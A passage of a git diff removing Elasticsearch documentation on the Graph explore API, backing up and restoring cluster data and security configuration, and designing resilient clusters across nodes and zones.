`elasticsearch.yml`. - -[discrete] -=== Request - -`POST /_graph/explore` - -[discrete] -=== Description - -An initial request to the `_explore` API contains a seed query that identifies -the documents of interest and specifies the fields that define the vertices -and connections you want to include in the graph. Subsequent `_explore` requests -enable you to _spider out_ from one more vertices of interest. You can exclude -vertices that have already been returned. - -[discrete] -=== Request Body - -[role="child_attributes"] -==== - -query:: -A seed query that identifies the documents of interest. Can be any valid -Elasticsearch query. For example: -+ -[source,js] --------------------------------------------------- -"query": { - "bool": { - "must": { - "match": { - "query.raw": "midi" - } - }, - "filter": [ - { - "range": { - "query_time": { - "gte": "2015-10-01 00:00:00" - } - } - } - ] - } -} --------------------------------------------------- - - -vertices:: -Specifies or more fields that contain the terms you want to include in the -graph as vertices. For example: -+ -[source,js] --------------------------------------------------- -"vertices": [ - { - "field": "product" - } -] --------------------------------------------------- -+ -.Properties for `vertices` -[%collapsible%open] -====== -field::: Identifies a field in the documents of interest. -include::: Identifies the terms of interest that form the starting points -from which you want to spider out. You do not have to specify a seed query -if you specify an include clause. The include clause implicitly querys for -documents that contain any of the listed terms listed. -In addition to specifying a simple array of strings, you can also pass -objects with `term` and `boost` values to boost matches on particular terms. -exclude::: -The `exclude` clause prevents the specified terms from being included in -the results. -size::: -Specifies the maximum number of vertex terms returned for each -field. Defaults to 5. -min_doc_count::: -Specifies how many documents must contain a pair of terms before it is -considered to be a useful connection. This setting acts as a certainty -threshold. Defaults to 3. -shard_min_doc_count::: -This advanced setting controls how many documents on a particular shard have -to contain a pair of terms before the connection is returned for global -consideration. Defaults to 2. -====== - -connections:: -Specifies or more fields from which you want to extract terms that are -associated with the specified vertices. For example: -+ -[source,js] --------------------------------------------------- -"connections": { <3> - "vertices": [ - { - "field": "query.raw" - } - ] -} --------------------------------------------------- -+ -NOTE: Connections can be nested inside the `connections` object to -explore additional relationships in the data. Each level of nesting is -considered a _hop_, and proximity within the graph is often described in -terms of _hop depth_. -+ -.Properties for `connections` -[%collapsible%open] -====== -query::: -An optional _guiding query_ that constrains the Graph API as it -explores connected terms. For example, you might want to direct the Graph -API to ignore older data by specifying a query that identifies recent -documents. -vertices::: -Contains the fields you are interested in. For example: -+ -[source,js] --------------------------------------------------- -"vertices": [ - { - "field": "query.raw", - "size": 5, - "min_doc_count": 10, - "shard_min_doc_count": 3 - } -] --------------------------------------------------- -====== - -controls:: Direct the Graph API how to build the graph. -+ -.Properties for `controls` -[%collapsible%open] -====== -use_significance::: -The `use_significance` flag filters associated terms so only those that are -significantly associated with your query are included. For information about -the algorithm used to calculate significance, see the -{ref}/search-aggregations-bucket-significantterms-aggregation.html[significant_terms -aggregation]. Defaults to `true`. -sample_size::: -Each _hop_ considers a sample of the best-matching documents on each -shard. Using samples improves the speed of execution and keeps -exploration focused on meaningfully-connected terms. Very small values -(less than 50) might not provide sufficient weight-of-evidence to identify -significant connections between terms. Very large sample sizes can dilute -the quality of the results and increase execution times. -Defaults to 100 documents. -timeout::: -The length of time in milliseconds after which exploration will be halted -and the results gathered so far are returned. This timeout is honored on -a best-effort basis. Execution might overrun this timeout if, for example, -a long pause is encountered while FieldData is loaded for a field. -sample_diversity::: -To avoid the top-matching documents sample being dominated by a single -source of results, it is sometimes necessary to request diversity in -the sample. You can do this by selecting a single-value field and setting -a maximum number of documents per value for that field. For example: -+ -[source,js] --------------------------------------------------- -"sample_diversity": { - "field": "category.raw", - "max_docs_per_value": 500 -} --------------------------------------------------- -====== -==== - -// [discrete] -// === Authorization - -[discrete] -=== Examples - -[discrete] -[[basic-search]] -==== Basic exploration - -An initial search typically begins with a query to identify strongly related terms. - -[source,console] --------------------------------------------------- -POST clicklogs/_graph/explore -{ - "query": { <1> - "match": { - "query.raw": "midi" - } - }, - "vertices": [ <2> - { - "field": "product" - } - ], - "connections": { <3> - "vertices": [ - { - "field": "query.raw" - } - ] - } -} --------------------------------------------------- - -<1> Seed the exploration with a query. This example is searching -clicklogs for people who searched for the term "midi". -<2> Identify the vertices to include in the graph. This example is looking for -product codes that are significantly associated with searches for "midi". -<3> Find the connections. This example is looking for other search -terms that led people to click on the products that are associated with -searches for "midi". - -The response from the explore API looks like this: - -[source,js] --------------------------------------------------- -{ - "took": 0, - "timed_out": false, - "failures": [], - "vertices": [ <1> - { - "field": "query.raw", - "term": "midi cable", - "weight": 0.08745858139552132, - "depth": 1 - }, - { - "field": "product", - "term": "8567446", - "weight": 0.13247784285434397, - "depth": 0 - }, - { - "field": "product", - "term": "1112375", - "weight": 0.018600718471158982, - "depth": 0 - }, - { - "field": "query.raw", - "term": "midi keyboard", - "weight": 0.04802242866755111, - "depth": 1 - } - ], - "connections": [ <2> - { - "source": 0, - "target": 1, - "weight": 0.04802242866755111, - "doc_count": 13 - }, - { - "source": 2, - "target": 3, - "weight": 0.08120623870976627, - "doc_count": 23 - } - ] -} --------------------------------------------------- -<1> An array of all of the vertices that were discovered. A vertex is an indexed -term, so the field and term value are provided. The `weight` attribute specifies -a significance score. The `depth` attribute specifies the hop-level at which -the term was first encountered. -<2> The connections between the vertices in the array. The `source` and `target` -properties are indexed into the vertices array and indicate which vertex term led -to the other as part of exploration. The `doc_count` value indicates how many -documents in the sample set contain this pairing of terms (this is -not a global count for all documents in the index). - -[discrete] -[[optional-controls]] -==== Optional controls - -The default settings are configured to remove noisy data and -get the "big picture" from your data. This example shows how to specify -additional parameters to influence how the graph is built. - -For tips on tuning the settings for more detailed forensic evaluation where -every document could be of interest, see the -{kibana-ref}/graph-troubleshooting.html[Troubleshooting] guide. - - -[source,console] --------------------------------------------------- -POST clicklogs/_graph/explore -{ - "query": { - "match": { - "query.raw": "midi" - } - }, - "controls": { - "use_significance": false, <1> - "sample_size": 2000, <2> - "timeout": 2000, <3> - "sample_diversity": { <4> - "field": "category.raw", - "max_docs_per_value": 500 - } - }, - "vertices": [ - { - "field": "product", - "size": 5, <5> - "min_doc_count": 10, <6> - "shard_min_doc_count": 3 <7> - } - ], - "connections": { - "query": { <8> - "bool": { - "filter": [ - { - "range": { - "query_time": { - "gte": "2015-10-01 00:00:00" - } - } - } - ] - } - }, - "vertices": [ - { - "field": "query.raw", - "size": 5, - "min_doc_count": 10, - "shard_min_doc_count": 3 - } - ] - } -} --------------------------------------------------- - -<1> Disable `use_significance` to include all associated terms, not just the -ones that are significantly associated with the query. -<2> Increase the sample size to consider a larger set of documents on -each shard. -<3> Limit how long a graph request runs before returning results. -<4> Ensure diversity in the sample by setting a limit on the number of documents -per value in a particular single-value field, such as a category field. -<5> Control the maximum number of vertex terms returned for each field. -<6> Set a certainty threshold that specifies how many documents have to contain -a pair of terms before we consider it to be a useful connection. -<7> Specify how many documents on a shard have to contain a pair of terms before -the connection is returned for global consideration. -<8> Restrict which document are considered as you explore connected terms. - - -[discrete] -[[spider-search]] -==== Spidering operations - -After an initial search, you typically want to select vertices of interest and -see what additional vertices are connected. In graph-speak, this operation is -referred to as "spidering". By submitting a series of requests, you can -progressively build a graph of related information. - -To spider out, you need to specify two things: - - * The set of vertices for which you want to find additional connections - * The set of vertices you already know about that you want to exclude from the - results of the spidering operation. - -You specify this information using `include`and `exclude` clauses. For example, -the following request starts with the product `1854873` and spiders -out to find additional search terms associated with that product. The terms -"midi", "midi keyboard", and "synth" are excluded from the results. - -[source,console] --------------------------------------------------- -POST clicklogs/_graph/explore -{ - "vertices": [ - { - "field": "product", - "include": [ "1854873" ] <1> - } - ], - "connections": { - "vertices": [ - { - "field": "query.raw", - "exclude": [ <2> - "midi keyboard", - "midi", - "synth" - ] - } - ] - } -} --------------------------------------------------- - -<1> The vertices you want to start from are specified -as an array of terms in an `include` clause. -<2> The `exclude` clause prevents terms you already know about from being -included in the results. diff --git a/docs/reference/gs-index.asciidoc b/docs/reference/gs-index.asciidoc deleted file mode 100644 index 30beb16b0df..00000000000 --- a/docs/reference/gs-index.asciidoc +++ /dev/null @@ -1,6 +0,0 @@ -[[elasticsearch-reference]] -= Elasticsearchリファレンス - -include::../Versions.asciidoc[] - -include::getting-started.asciidoc[] diff --git a/docs/reference/high-availability.asciidoc b/docs/reference/high-availability.asciidoc deleted file mode 100644 index 52bbc553dde..00000000000 --- a/docs/reference/high-availability.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ -[[high-availability]] -= Set up a cluster for high availability - -[partintro] --- -Your data is important to you. Keeping it safe and available is important -to {es}. Sometimes your cluster may experience hardware failure or a power -loss. To help you plan for this, {es} offers a number of features -to achieve high availability despite failures. - -* With proper planning, a cluster can be - <> to many of the - things that commonly go wrong, from the loss of a single node or network - connection right up to a zone-wide outage such as power loss. - -* You can use <> to replicate data to a remote _follower_ - cluster which may be in a different data centre or even on a different - continent from the leader cluster. The follower cluster acts as a hot - standby, ready for you to fail over in the event of a disaster so severe that - the leader cluster fails. The follower cluster can also act as a geo-replica - to serve searches from nearby clients. - -* The last line of defence against data loss is to take - <> of your cluster so that you can restore - a completely fresh copy of it elsewhere if needed. --- - -include::high-availability/cluster-design.asciidoc[] - -include::high-availability/backup-cluster.asciidoc[] - -include::ccr/index.asciidoc[] diff --git a/docs/reference/high-availability/backup-and-restore-security-config.asciidoc b/docs/reference/high-availability/backup-and-restore-security-config.asciidoc deleted file mode 100644 index 47fa196d2cb..00000000000 --- a/docs/reference/high-availability/backup-and-restore-security-config.asciidoc +++ /dev/null @@ -1,276 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[security-backup]] -=== Back up a cluster's security configuration -++++ -Back up the security configuration -++++ - -Security configuration information resides in two places: -<> and -<>. - -[discrete] -[[backup-security-file-based-configuration]] -==== Back up file-based security configuration - -{es} {security-features} are configured using the <> inside the `elasticsearch.yml` and -`elasticsearch.keystore` files. In addition there are several other -<> inside the same `ES_PATH_CONF` -directory. These files define roles and role mappings and configure the -<>. Some of the -settings specify file paths to security-sensitive data, such as TLS keys and -certificates for the HTTP client and inter-node communication and private key files for -<>, <> and the -<> realms. All these are also stored inside -`ES_PATH_CONF`; the path settings are relative. - -IMPORTANT: The `elasticsearch.keystore`, TLS keys and SAML, OIDC, and Kerberos -realms private key files require confidentiality. This is crucial when files -are copied to the backup location, as this increases the surface for malicious -snooping. - -To back up all this configuration you can use a <>, as described in the previous section. - -[NOTE] -==== - -* File backups must run on every cluster node. -* File backups will store non-security configuration as well. Backing-up -only {security-features} configuration is not supported. A backup is a -point in time record of state of the complete configuration. - -==== - -[discrete] -[[backup-security-index-configuration]] -==== Back up index-based security configuration - -{es} {security-features} store system configuration data inside a -dedicated index. This index is named `.security-6` in the {es} 6.x versions and -`.security-7` in the 7.x releases. The `.security` alias always points to the -appropriate index. This index contains the data which is not available in -configuration files and *cannot* be reliably backed up using standard -filesystem tools. This data describes: - -* the definition of users in the native realm (including hashed passwords) -* role definitions (defined via the <>) -* role mappings (defined via the - <>) -* application privileges -* API keys - -The `.security` index thus contains resources and definitions in addition to -configuration information. All of that information is required in a complete -{security-features} backup. - -Use the <> to backup -`.security`, as you would for any <>. -For convenience, here are the complete steps: - -. Create a repository that you can use to backup the `.security` index. -It is preferable to have a <> for -this special index. If you wish, you can also snapshot the system indices for other {stack} components to this repository. -+ --- -[source,console] ------------------------------------ -PUT /_snapshot/my_backup -{ - "type": "fs", - "settings": { - "location": "my_backup_location" - } -} ------------------------------------ - -The user calling this API must have the elevated `manage` cluster privilege to -prevent non-administrators exfiltrating data. - --- - -. Create a user and assign it only the built-in `snapshot_user` role. -+ --- -The following example creates a new user `snapshot_user` in the -<>, but it is not important which -realm the user is a member of: - -[source,console] --------------------------------------------------- -POST /_security/user/snapshot_user -{ - "password" : "secret", - "roles" : [ "snapshot_user" ] -} --------------------------------------------------- -// TEST[skip:security is not enabled in this fixture] - --- - -. Create incremental snapshots authorized as `snapshot_user`. -+ --- -The following example shows how to use the create snapshot API to backup -the `.security` index to the `my_backup` repository: - -[source,console] --------------------------------------------------- -PUT /_snapshot/my_backup/snapshot_1 -{ - "indices": ".security", - "include_global_state": true <1> -} --------------------------------------------------- -// TEST[continued] - -<1> This parameter value captures all the persistent settings stored in the -global cluster metadata as well as other configurations such as aliases and -stored scripts. Note that this includes non-security configuration and that it complements but does not replace the -<>. - --- - -IMPORTANT: The index format is only compatible within a single major version, -and cannot be restored onto a version earlier than the version from which it -originated. For example, you can restore a security snapshot from 6.6.0 into a -6.7.0 cluster, but you cannot restore it to a cluster running {es} 6.5.0 or 7.0.0. - -[discrete] -[[backup-security-repos]] -===== Controlling access to the backup repository - -The snapshot of the security index will typically contain sensitive data such -as user names and password hashes. Because passwords are stored using -<>, the disclosure of a snapshot would -not automatically enable a third party to authenticate as one of your users or -use API keys. However, it would disclose confidential information. - -It is also important that you protect the integrity of these backups in case -you ever need to restore them. If a third party is able to modify the stored -backups, they may be able to install a back door that would grant access if the -snapshot is loaded into an {es} cluster. - -We recommend that you: - -* Snapshot the `.security` index in a dedicated repository, where read and write -access is strictly restricted and audited. -* If there are indications that the snapshot has been read, change the passwords -of the users in the native realm and revoke API keys. -* If there are indications that the snapshot has been tampered with, do not -restore it. There is currently no option for the restore process to detect -malicious tampering. - -[[restore-security-configuration]] -=== Restore a cluster's security configuration -++++ -Restore the security configuration -++++ - -NOTE: You can restore a snapshot of the `.security` index only if it was -created in a previous minor version in the same major version. The last minor -version of every major release can convert and read formats of the index for -both its major version and the next one. - -When you restore security configuration you have the option of doing a complete -restore of *all* configurations, including non-security ones, or to only restore -the contents of the `.security` index. As described in -<>, the second option comprises only -resource-type configurations. The first option has the advantage of restoring -a cluster to a clearly defined state from a past point in time. The second option -touches only security configuration resources, but it does not completely restore -the {security-features}. - -To restore your security configuration from a backup, first make sure that the -repository holding `.security` snapshots is installed: - -[source,console] --------------------------------------------------- -GET /_snapshot/my_backup --------------------------------------------------- -// TEST[continued] - -[source,console] --------------------------------------------------- -GET /_snapshot/my_backup/snapshot_1 --------------------------------------------------- -// TEST[continued] - -Then log into one of the node hosts, navigate to {es} installation directory, -and follow these steps: - -. Add a new user with the `superuser` built-in role to the -<>. -+ --- -For example, create a user named `restore_user`: -[source,shell] --------------------------------------------------- -bin/elasticsearch-users useradd restore_user -p password -r superuser --------------------------------------------------- --- - -. Using the previously created user, delete the existing `.security-6` or -`.security-7` index. -+ --- -[source,shell] --------------------------------------------------- -curl -u restore_user -X DELETE "localhost:9200/.security-*" --------------------------------------------------- -// NOTCONSOLE - -WARNING: After this step any authentication that relies on the `.security` -index will not work. This means that all API calls that authenticate with -native or reserved users will fail, as will any user that relies on a native role. -The file realm user we created in the step above will continue to work -because it is not stored in the `.security` index and uses the built-in -`superuser` role. - --- - -. Using the same user, restore the `.security` index from the snapshot. -+ --- -[source,shell] --------------------------------------------------- - curl -u restore_user -X POST "localhost:9200/_snapshot/my_backup/snapshot_1/_restore" -H 'Content-Type: application/json' -d' - { - "indices": ".security-*", - "include_global_state": true <1> - } - ' --------------------------------------------------- -// NOTCONSOLE - -<1> The `include_global_state: true` is mandatory only for a complete restore. -This will restore the global cluster metadata, which contains configuration -information for the complete cluster. If you set this to `false`, it recovers -only the contents of the `.security` index, such as usernames and password -hashes, API keys, application privileges, role and role mapping definitions. --- - -. Optionally, if you need to review and override the settings that were included -in the snapshot (by the `include_global_state` flag), cherry-pick and -<> that you -<> with the -`GET _cluster/settings` API. - -. If you pursue a complete point in time restore of the cluster, you also have -to restore configuration files. Again, this will restore non-security settings as -well. -+ --- -This entails a straight-up filesystem copy of the backed up configuration files, -overwriting the contents of `$ES_PATH_CONF`, and restarting the node. This -needs to be done on *every node*. Depending on the extent of the differences -between your current cluster configuration and the restored configuration, you -may not be able to perform a rolling restart. If you are performing a full -restore of your configuration directory, we recommend a full cluster restart as -the safest option. Alternatively, you may wish to restore your configuration -files to a separate location on disk and use file comparison tools to review -the differences between your existing configuration and the restored -configuration. --- diff --git a/docs/reference/high-availability/backup-cluster-config.asciidoc b/docs/reference/high-availability/backup-cluster-config.asciidoc deleted file mode 100644 index 109227e8154..00000000000 --- a/docs/reference/high-availability/backup-cluster-config.asciidoc +++ /dev/null @@ -1,60 +0,0 @@ -[[backup-cluster-configuration]] -=== Back up a cluster's configuration -++++ -Back up the cluster configuration -++++ - -In addition to backing up the data in a cluster, it is important to back up its configuration--especially when the cluster becomes large and difficult to -reconstruct. - -Configuration information resides in -<> on every cluster node. Sensitive -setting values such as passwords for the {watcher} notification servers, are -specified inside a binary secure container, the -<> file. Some setting values are -file paths to the associated configuration data, such as the ingest geo ip -database. All these files are contained inside the `ES_PATH_CONF` directory. - -NOTE: All changes to configuration files are done by manually editing the files -or using command line utilities, but *not* through APIs. In practice, these -changes are infrequent after the initial setup. - -We recommend that you take regular (ideally, daily) backups of your {es} config -(`$ES_PATH_CONF`) directory using the file backup software of your choice. - -TIP: We recommend that you have a configuration management plan for these -configuration files. You may wish to check them into version control, or -provision them though your choice of configuration management tool. - -Some of these files may contain sensitive data such as passwords and TLS keys, -therefore you should investigate whether your backup software and/or storage -solution are able to encrypt this data. - -Some settings in configuration files might be overridden by -<>. You can capture these settings in -a *data* backup snapshot by specifying the `include_global_state: true` (default) -parameter for the snapshot API. Alternatively, you can extract these -configuration values in text format by using the -<>: - -[source,console] --------------------------------------------------- -GET _cluster/settings?pretty&flat_settings&filter_path=persistent --------------------------------------------------- - -You can store the output of this as a file together with the rest of -configuration files. - -[NOTE] -==== - -* Transient settings are not considered for backup. -* {es} {security-features} store configuration data such as role definitions and -API keys inside a dedicate special index. This "system" data, -complements the <> configuration and should -be <>. -* Other {stack} components, like Kibana and {ml-cap}, store their configuration -data inside other dedicated indices. From the {es} perspective these are just data -so you can use the regular <> process. - -==== diff --git a/docs/reference/high-availability/backup-cluster-data.asciidoc b/docs/reference/high-availability/backup-cluster-data.asciidoc deleted file mode 100644 index 4053d6e47b6..00000000000 --- a/docs/reference/high-availability/backup-cluster-data.asciidoc +++ /dev/null @@ -1,27 +0,0 @@ -[[backup-cluster-data]] -=== Back up a cluster's data -++++ -Back up the data -++++ - -To back up your cluster's data, you can use the <>. - -include::../snapshot-restore/index.asciidoc[tag=snapshot-intro] - -[TIP] -==== -If your cluster has {es} {security-features} enabled, when you back up your data -the snapshot API call must be authorized. - -The `snapshot_user` role is a reserved role that can be assigned to the user -who is calling the snapshot endpoint. This is the only role necessary if all the user -does is periodic snapshots as part of the backup procedure. This role includes -the privileges to list all the existing snapshots (of any repository) as -well as list and view settings of all indices, including the `.security` index. -It does *not* grant privileges to create repositories, restore snapshots, or -search within indices. Hence, the user can view and snapshot all indices, but cannot -access or modify any data. - -For more information, see <> -and <>. -==== diff --git a/docs/reference/high-availability/backup-cluster.asciidoc b/docs/reference/high-availability/backup-cluster.asciidoc deleted file mode 100644 index 37490293554..00000000000 --- a/docs/reference/high-availability/backup-cluster.asciidoc +++ /dev/null @@ -1,22 +0,0 @@ -[[backup-cluster]] -== Back up a cluster - -include::../snapshot-restore/index.asciidoc[tag=backup-warning] - -To have a complete backup for your cluster: - -. <> -. <> -. <> - -To restore your cluster from a backup: - -. <> -. <> - - - -include::backup-cluster-data.asciidoc[] -include::backup-cluster-config.asciidoc[] -include::backup-and-restore-security-config.asciidoc[] -include::restore-cluster-data.asciidoc[] diff --git a/docs/reference/high-availability/cluster-design.asciidoc b/docs/reference/high-availability/cluster-design.asciidoc deleted file mode 100644 index 914db1a1d1f..00000000000 --- a/docs/reference/high-availability/cluster-design.asciidoc +++ /dev/null @@ -1,355 +0,0 @@ -[[high-availability-cluster-design]] -== Designing for resilience - -Distributed systems like {es} are designed to keep working even if some of -their components have failed. As long as there are enough well-connected -nodes to take over their responsibilities, an {es} cluster can continue -operating normally if some of its nodes are unavailable or disconnected. - -There is a limit to how small a resilient cluster can be. All {es} clusters -require: - -* One <> node -* At least one node for each <>. -* At least one copy of every <>. - -A resilient cluster requires redundancy for every required cluster component. -This means a resilient cluster must have: - -* At least three master-eligible nodes -* At least two nodes of each role -* At least two copies of each shard (one primary and one or more replicas) - -A resilient cluster needs three master-eligible nodes so that if one of -them fails then the remaining two still form a majority and can hold a -successful election. - -Similarly, redundancy of nodes of each role means that if a node for a -particular role fails, another node can take on its responsibilities. - -Finally, a resilient cluster should have at least two copies of each shard. If -one copy fails then there should be another good copy to take over. {es} -automatically rebuilds any failed shard copies on the remaining nodes in order -to restore the cluster to full health after a failure. - -Failures temporarily reduce the total capacity of your cluster. In addition, -after a failure the cluster must perform additional background activities to -restore itself to health. You should make sure that your cluster has the -capacity to handle your workload even if some nodes fail. - -Depending on your needs and budget, an {es} cluster can consist of a single -node, hundreds of nodes, or any number in between. When designing a smaller -cluster, you should typically focus on making it resilient to single-node -failures. Designers of larger clusters must also consider cases where multiple -nodes fail at the same time. The following pages give some recommendations for -building resilient clusters of various sizes: - -* <> -* <> - -[[high-availability-cluster-small-clusters]] -=== Resilience in small clusters - -In smaller clusters, it is most important to be resilient to single-node -failures. This section gives some guidance on making your cluster as resilient -as possible to the failure of an individual node. - -[[high-availability-cluster-design-one-node]] -==== One-node clusters - -If your cluster consists of one node, that single node must do everything. -To accommodate this, {es} assigns nodes every role by default. - -A single node cluster is not resilient. If the node fails, the cluster will -stop working. Because there are no replicas in a one-node cluster, you cannot -store your data redundantly. However, by default at least one replica is -required for a <>. To ensure your -cluster can report a `green` status, override the default by setting -<> to `0` on every index. - -If the node fails, you may need to restore an older copy of any lost indices -from a <>. - -Because they are not resilient to any failures, we do not recommend using -one-node clusters in production. - -[[high-availability-cluster-design-two-nodes]] -==== Two-node clusters - -If you have two nodes, we recommend they both be data nodes. You should also -ensure every shard is stored redundantly on both nodes by setting -<> to `1` on every index. -This is the default number of replicas but may be overridden by an -<>. <> can also achieve the same thing, but it's not necessary to use this -feature in such a small cluster. - -We recommend you set `node.master: false` on one of your two nodes so that it is -not <>. This means you can be certain which of your -nodes is the elected master of the cluster. The cluster can tolerate the loss of -the other master-ineligible node. If you don't set `node.master: false` on one -node, both nodes are master-eligible. This means both nodes are required for a -master election. Since the election will fail if either node is unavailable, -your cluster cannot reliably tolerate the loss of either node. - -By default, each node is assigned every role. We recommend you assign both nodes -all other roles except master eligibility. If one node fails, the other node can -handle its tasks. - -You should avoid sending client requests to just one of your nodes. If you do -and this node fails, such requests will not receive responses even if the -remaining node is a healthy cluster on its own. Ideally, you should balance your -client requests across both nodes. A good way to do this is to specify the -addresses of both nodes when configuring the client to connect to your cluster. -Alternatively, you can use a resilient load balancer to balance client requests -across the nodes in your cluster. - -Because it's not resilient to failures, we do not recommend deploying a two-node -cluster in production. - -[[high-availability-cluster-design-two-nodes-plus]] -==== Two-node clusters with a tiebreaker - -Because master elections are majority-based, the two-node cluster described -above is tolerant to the loss of one of its nodes but not the -other one. You cannot configure a two-node cluster so that it can tolerate -the loss of _either_ node because this is theoretically impossible. You might -expect that if either node fails then {es} can elect the remaining node as the -master, but it is impossible to tell the difference between the failure of a -remote node and a mere loss of connectivity between the nodes. If both nodes -were capable of running independent elections, a loss of connectivity would -lead to a {wikipedia}/Split-brain_(computing)[split-brain -problem] and therefore data loss. {es} avoids this and -protects your data by electing neither node as master until that node can be -sure that it has the latest cluster state and that there is no other master in -the cluster. This could result in the cluster having no master until -connectivity is restored. - -You can solve this problem by adding a third node and making all three nodes -master-eligible. A <> requires only -two of the three master-eligible nodes. This means the cluster can tolerate the -loss of any single node. This third node acts as a tiebreaker in cases where the -two original nodes are disconnected from each other. You can reduce the resource -requirements of this extra node by making it a <>, also known as a dedicated tiebreaker. -Because it has no other roles, a dedicated tiebreaker does not need to be as -powerful as the other two nodes. It will not perform any searches nor coordinate -any client requests and cannot be elected as the master of the cluster. - -The two original nodes should not be voting-only master-eligible nodes since a -resilient cluster requires at least three master-eligible nodes, at least two -of which are not voting-only master-eligible nodes. If two of your three nodes -are voting-only master-eligible nodes then the elected master must be the third -node. This node then becomes a single point of failure. - -We recommend assigning both non-tiebreaker nodes all other roles. This creates -redundancy by ensuring any task in the cluster can be handled by either node. - -You should not send any client requests to the dedicated tiebreaker node. -You should also avoid sending client requests to just one of the other two -nodes. If you do, and this node fails, then any requests will not -receive responses, even if the remaining nodes form a healthy cluster. Ideally, -you should balance your client requests across both of the non-tiebreaker -nodes. You can do this by specifying the address of both nodes -when configuring your client to connect to your cluster. Alternatively, you can -use a resilient load balancer to balance client requests across the appropriate -nodes in your cluster. The {ess-trial}[Elastic Cloud] service -provides such a load balancer. - -A two-node cluster with an additional tiebreaker node is the smallest possible -cluster that is suitable for production deployments. - -[[high-availability-cluster-design-three-nodes]] -==== Three-node clusters - -If you have three nodes, we recommend they all be <> and every index should have at least one replica. Nodes are data nodes -by default. You may prefer for some indices to have two replicas so that each -node has a copy of each shard in those indices. You should also configure each -node to be <> so that any two of them can hold a -master election without needing to communicate with the third node. Nodes are -master-eligible by default. This cluster will be resilient to the loss of any -single node. - -You should avoid sending client requests to just one of your nodes. If you do, -and this node fails, then any requests will not receive responses even if the -remaining two nodes form a healthy cluster. Ideally, you should balance your -client requests across all three nodes. You can do this by specifying the -address of multiple nodes when configuring your client to connect to your -cluster. Alternatively you can use a resilient load balancer to balance client -requests across your cluster. The {ess-trial}[Elastic Cloud] -service provides such a load balancer. - -[[high-availability-cluster-design-three-plus-nodes]] -==== Clusters with more than three nodes - -Once your cluster grows to more than three nodes, you can start to specialise -these nodes according to their responsibilities, allowing you to scale their -resources independently as needed. You can have as many <>, <>, <>, etc. as needed to -support your workload. As your cluster grows larger, we recommend using -dedicated nodes for each role. This lets you to independently scale resources -for each task. - -However, it is good practice to limit the number of master-eligible nodes in -the cluster to three. Master nodes do not scale like other node types since -the cluster always elects just one of them as the master of the cluster. If -there are too many master-eligible nodes then master elections may take a -longer time to complete. In larger clusters, we recommend you -configure some of your nodes as dedicated master-eligible nodes and avoid -sending any client requests to these dedicated nodes. Your cluster may become -unstable if the master-eligible nodes are overwhelmed with unnecessary extra -work that could be handled by one of the other nodes. - -You may configure one of your master-eligible nodes to be a -<> so that it can never be elected as the -master node. For instance, you may have two dedicated master nodes and a third -node that is both a data node and a voting-only master-eligible node. This -third voting-only node will act as a tiebreaker in master elections but will -never become the master itself. - -[[high-availability-cluster-design-small-cluster-summary]] -==== Summary - -The cluster will be resilient to the loss of any node as long as: - -- The <> is `green`. -- There are at least two data nodes. -- Every index has at least one replica of each shard, in addition to the - primary. -- The cluster has at least three master-eligible nodes, as long as at least two - of these nodes are not voting-only master-eligible nodes. -- Clients are configured to send their requests to more than one node or are - configured to use a load balancer that balances the requests across an - appropriate set of nodes. The {ess-trial}[Elastic Cloud] service provides such - a load balancer. - -[[high-availability-cluster-design-large-clusters]] -=== Resilience in larger clusters - -It is not unusual for nodes to share some common infrastructure, such as a power -supply or network router. If so, you should plan for the failure of this -infrastructure and ensure that such a failure would not affect too many of your -nodes. It is common practice to group all the nodes sharing some infrastructure -into _zones_ and to plan for the failure of any whole zone at once. - -Your cluster’s zones should all be contained within a single data centre. {es} -expects its node-to-node connections to be reliable and have low latency and -high bandwidth. Connections between data centres typically do not meet these -expectations. Although {es} will behave correctly on an unreliable or slow -network, it will not necessarily behave optimally. It may take a considerable -length of time for a cluster to fully recover from a network partition since it -must resynchronize any missing data and rebalance the cluster once the -partition heals. If you want your data to be available in multiple data centres, -deploy a separate cluster in each data centre and use -<> or <> to link the -clusters together. These features are designed to perform well even if the -cluster-to-cluster connections are less reliable or slower than the network -within each cluster. - -After losing a whole zone's worth of nodes, a properly-designed cluster may be -functional but running with significantly reduced capacity. You may need -to provision extra nodes to restore acceptable performance in your -cluster when handling such a failure. - -For resilience against whole-zone failures, it is important that there is a copy -of each shard in more than one zone, which can be achieved by placing data -nodes in multiple zones and configuring <>. You should also ensure that client requests are sent to nodes in -more than one zone. - -You should consider all node roles and ensure that each role is split -redundantly across two or more zones. For instance, if you are using -<> or {ml}, you should have ingest or {ml} nodes in two -or more zones. However, the placement of master-eligible nodes requires a little -more care because a resilient cluster needs at least two of the three -master-eligible nodes in order to function. The following sections explore the -options for placing master-eligible nodes across multiple zones. - -[[high-availability-cluster-design-two-zones]] -==== Two-zone clusters - -If you have two zones, you should have a different number of -master-eligible nodes in each zone so that the zone with more nodes will -contain a majority of them and will be able to survive the loss of the other -zone. For instance, if you have three master-eligible nodes then you may put -all of them in one zone or you may put two in one zone and the third in the -other zone. You should not place an equal number of master-eligible nodes in -each zone. If you place the same number of master-eligible nodes in each zone, -neither zone has a majority of its own. Therefore, the cluster may not survive -the loss of either zone. - -[[high-availability-cluster-design-two-zones-plus]] -==== Two-zone clusters with a tiebreaker - -The two-zone deployment described above is tolerant to the loss of one of its -zones but not to the loss of the other one because master elections are -majority-based. You cannot configure a two-zone cluster so that it can tolerate -the loss of _either_ zone because this is theoretically impossible. You might -expect that if either zone fails then {es} can elect a node from the remaining -zone as the master but it is impossible to tell the difference between the -failure of a remote zone and a mere loss of connectivity between the zones. If -both zones were capable of running independent elections then a loss of -connectivity would lead to a -{wikipedia}/Split-brain_(computing)[split-brain problem] and -therefore data loss. {es} avoids this and protects your data by not electing -a node from either zone as master until that node can be sure that it has the -latest cluster state and that there is no other master in the cluster. This may -mean there is no master at all until connectivity is restored. - -You can solve this by placing one master-eligible node in each of your two -zones and adding a single extra master-eligible node in an independent third -zone. The extra master-eligible node acts as a tiebreaker in cases -where the two original zones are disconnected from each other. The extra -tiebreaker node should be a <>, also known as a dedicated tiebreaker. A dedicated -tiebreaker need not be as powerful as the other two nodes since it has no other -roles and will not perform any searches nor coordinate any client requests nor -be elected as the master of the cluster. - -You should use <> to ensure -that there is a copy of each shard in each zone. This means either zone remains -fully available if the other zone fails. - -All master-eligible nodes, including voting-only nodes, are on the critical path -for publishing cluster state updates. Because of this, these nodes require -reasonably fast persistent storage and a reliable, low-latency network -connection to the rest of the cluster. If you add a tiebreaker node in a third -independent zone then you must make sure it has adequate 